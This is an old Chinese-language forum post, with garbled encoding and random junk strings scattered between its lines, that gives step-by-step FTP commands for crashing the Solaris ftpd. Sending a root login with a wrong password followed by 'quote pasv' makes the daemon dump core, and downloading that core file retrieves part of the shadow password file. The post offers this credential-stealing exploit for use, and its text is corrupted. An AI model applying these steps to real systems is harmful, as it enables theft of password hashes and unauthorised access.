該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG�����,使得用戶可以獲得該機(jī)的口令文件�。具體過程如下:- t+ a1 C! h! S
/ i7 ~7 s4 [7 J7 S1.通過 ftp 正常登錄到目的主機(jī)上
6 j8 w5 \, q2 T/ m
% C4 I C T' a; h- h0 T$ c2.輸入如下命令序列:! F! h7 m/ W7 O+ X* U
. A2 h5 L. g. ?4 N: z, \; v/ m% L8 pftp> user root wrongpasswd
% Y- e9 }1 S( T, n5 q; _% V
, `$ V8 c% D! ]ftp> quote pasv$ y+ @4 A( O, G! |
/ q2 O. f: c( z5 ^" @9 E0 R3.這時(shí)���,ftpd會(huì)報(bào)錯(cuò)退出�����,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�����,口令文件就包含在這個(gè)core中�。% p3 q, G7 @+ M+ a% I3 K" Q) j3 `
& O' X& M& T% B
4.再次進(jìn)入FTP >get core0 C& n8 U+ f8 ]( ^4 S; ^) m
1 A9 T0 l/ W9 ~7 H9 [+ |# {補(bǔ)充:雖然在core只有一部分shadow,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了* k) v$ @! N2 n% a) q
- i, a; g; v$ @* N1 \" K |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡